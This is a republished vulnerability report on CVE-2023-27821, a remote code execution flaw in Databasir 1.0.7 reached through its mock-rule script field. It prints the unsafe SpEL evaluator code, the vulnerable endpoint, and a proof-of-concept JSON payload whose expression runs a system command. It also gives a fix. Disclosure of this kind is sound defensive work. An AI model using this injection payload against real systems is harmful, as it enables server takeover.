Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-27821: database-1.0.7 存在RCE漏洞 · Issue #269 · vran-dev/databasir

Databasir v1.0.7 was discovered to contain a remote code execution (RCE) vulnerability via the mockDataScript parameter.

CVE
Open in Source
#vulnerability#web#js#git#java#rce#auth

影响

Databasir is a team-oriented relational database model document management platform.
Databasir 1.0.7 has remote code execution vulnerability.
Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as open -a Calculator

不安全的代码

SpelScriptEvaluator使用了StandardEvaluationContext作为context,script参数可控并且没有任何过滤

SimpleEvaluationContext - 针对不需要 SpEL 语言语法的全部范围并且应该受到有意限制的表达式类别,公开 Spal 语言特性和配置选项的子集。

StandardEvaluationContext - 公开全套 SpEL 语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。

@Component @RequiredArgsConstructor public class SpelScriptEvaluator implements MockScriptEvaluator {

private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser();

@Override
public String evaluate(String script, ScriptContext context) {
    Expression expression = spelExpressionParser.parseExpression(script);
    StandardEvaluationContext spelContext = new StandardEvaluationContext(context);
    return expression.getValue(spelContext, String.class);
}

}

漏洞入口

在进行rules校验时

@PreAuthorize("hasAnyAuthority('SYS\_OWNER', 'GROUP\_OWNER?groupId='+#groupId, 'GROUP\_MEMBER?groupId='+#groupId)")
@Operation(summary = "保存 Mock Rule")
@AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule",
        involvedProjectId = "#projectId",
        involvedGroupId = "#groupId")
@PostMapping(Routes.MockData.SAVE\_MOCK\_RULE)
public JsonData<Void\> saveMockRules(@PathVariable Integer groupId,
                                    @PathVariable Integer projectId,
                                    @PathVariable Integer tableId,
                                    @RequestBody @Valid List<ColumnMockRuleSaveRequest\> rules) {
    mockDataService.saveMockRules(projectId, tableId, rules);
    return JsonData.ok();
}

POC

攻击者可以控制rules的参数来造成rce,例如:

[ { "columnName": "test", "dependentColumnName": "test", "dependentTableName": "test", "mockDataScript": "T(java.lang.String).forName(‘java.lang.Runtime’).getRuntime().exec(‘open -a Calculator’)", "mockDataType": "SCRIPT", "tableName": “test” } ]

修复建议

最直接的方式:使用SimpleEvaluationContext来替换StandardEvaluationContext

报告人

@luelueking

来源

https://github.com/luelueking/Databasir-1.0.7-vuln-poc

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE